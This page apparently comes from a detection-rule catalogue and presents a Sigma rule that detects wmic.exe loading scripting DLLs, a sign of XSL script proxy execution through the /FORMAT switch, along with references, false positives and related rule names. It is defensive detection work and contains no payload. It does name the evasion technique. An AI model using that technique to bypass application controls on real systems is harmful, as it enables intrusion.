WMIC Loading Scripting Libraries
Detects threat actors proxy executing code and bypassing application controls by leveraging wmic and the /FORMAT
argument switch to download and execute an XSL file (i.e js, vbs, etc).
Sigma rule (View on GitHub)
1title: WMIC Loading Scripting Libraries
2id: 06ce37c2-61ab-4f05-9ff5-b1a96d18ae32
3status: test
4description: Detects threat actors proxy executing code and bypassing application controls by leveraging wmic and the `/FORMAT` argument switch to download and execute an XSL file (i.e js, vbs, etc).
5references:
6 - https://securitydatasets.com/notebooks/atomic/windows/defense_evasion/SDWIN-201017061100.html
7 - https://twitter.com/dez_/status/986614411711442944
8 - https://lolbas-project.github.io/lolbas/Binaries/Wmic/
9author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
10date: 2020-10-17
11modified: 2022-10-13
12tags:
13 - attack.defense-evasion
14 - attack.t1220
15logsource:
16 category: image_load
17 product: windows
18detection:
19 selection:
20 Image|endswith: '\wmic.exe'
21 ImageLoaded|endswith:
22 - '\jscript.dll'
23 - '\vbscript.dll'
24 condition: selection
25falsepositives:
26 - The command wmic os get lastboottuptime loads vbscript.dll
27 - The command wmic os get locale loads vbscript.dll
28 - Since the ImageLoad event doesn't have enough information in this case. It's better to look at the recent process creation events that spawned the WMIC process and investigate the command line and parent/child processes to get more insights
29level: medium
References
Related rules
- Msxsl.EXE Execution
- XSL Script Execution Via WMIC.EXE
- AD Object WriteDAC Access
- ADS Zone.Identifier Deleted By Uncommon Application
- AMSI Bypass Pattern Assembly GetType